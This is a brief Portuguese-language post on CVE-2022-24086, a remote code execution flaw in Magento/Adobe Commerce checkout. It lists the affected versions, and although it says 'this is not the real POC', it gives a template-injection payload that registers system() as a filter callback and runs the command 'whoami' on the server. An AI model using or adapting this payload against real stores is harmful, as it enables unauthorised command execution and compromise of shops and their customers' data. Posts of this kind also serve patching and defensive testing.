
CVE-2022-24086 sobre Magento RCE
CVE-2022-24086 sobre RCE no Magento
As versões do Adobe Commerce 2.4.3-p1 (e anteriores) e 2.3.7-p2 (e anteriores) são afetadas por uma vulnerabilidade de validação de entrada inadequada durante o processo de checkout. A exploração deste problema não requer interação do usuário e pode resultar na execução arbitrária de código.
Aviso: Esta não é a verdadeira POC ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}